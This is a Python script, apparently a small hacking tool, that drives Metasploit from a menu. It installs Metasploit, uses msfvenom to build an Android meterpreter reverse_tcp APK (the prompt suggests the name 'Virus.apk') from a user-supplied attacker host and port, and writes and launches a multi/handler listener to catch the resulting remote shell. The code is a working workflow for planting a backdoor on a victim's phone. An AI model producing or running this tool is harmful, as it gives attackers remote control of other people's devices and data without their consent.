from ftplib import FTP
import os
Gris = '\033[95m'
Ciel = '\033[94m'
Bleu = '\033[92m'
Rose = '\033[93m'
Jaune = '\033[91m'
Vert = '\033[0m'
Brun = '\033[33m'


def Menu1():
    print("Downloding Metasploit installer")
    os.system("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall")
    print('Lunching Metasploit Installer')
    os.system("chmod +x msfinstall")
    os.system("./msfinstall")
    exit()



def Menu2():
    print('enter the host')
    cmd1 = input('LHOST>')
    print('enter the port')
    cmd2 = input('LPORT>')
    print('enter the file name Ex: Virus.apk')
    cmd3 = input('FileName>')
    msfvenom = ('msfvenom -p android/meterpreter/reverse_tcp LHOST=' + cmd1 + ' LPORT=' + cmd2 +' -o '+ cmd3)
    os.system(msfvenom)
    plugin = ("use multi/handler\nset payload android/meterpreter/reverse_tcp\nset lhost "+ cmd1 +"\nset lport "+ cmd2 +"\nexploit")
    f = open("pluginrc", "w")
    f.write(plugin)
    f.close()
    try:
        v = input('Continue...')
    except:
        Main2()
    if v == ('') or v == ('ok'):
        Main2()
    else:
        Main2()
    Main2()
    exit()


def Menu3():
    msfconsole = ('msfconsole -r pluginrc')
    os.system(msfconsole)
    exit()

def error():
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    try:
        v = input('not a good answer...')
    except:
        Main2()
    if v == ('') or v == ('ok'):
        Main2()
    else:
        Main2()
def Main():
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print(Rose+'welcome:')
    try:
        name = input('')
    except:
        Main2()
    else:
        Main2()
def Main2():

    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('\x1bc')
    print('')
    print(Rose+'Chose whats you wanna do:')
    print('\x1bc')
    print('1-Install Metasploit (Needed)')
    print(Jaune+'2-Make the injected APK')
    print('3-Run the Meterpreter')
    try:
        v = input(Ciel+'@Outshit>')
    except v == 'exit':
        exit()
        error()
    if v == '1':
        print('Metasploit Installer')
        Menu1()
    if v == '2':
        print('APK Creator')
        Menu2()
    if v == '3':
        print('The Metasploit is starting')
        Menu3()
    else:
        print(Jaune+''+v+' is not an anwser!')
        v = input(Bleu+'Press')
        Main2()
Main()
Main2()
error()
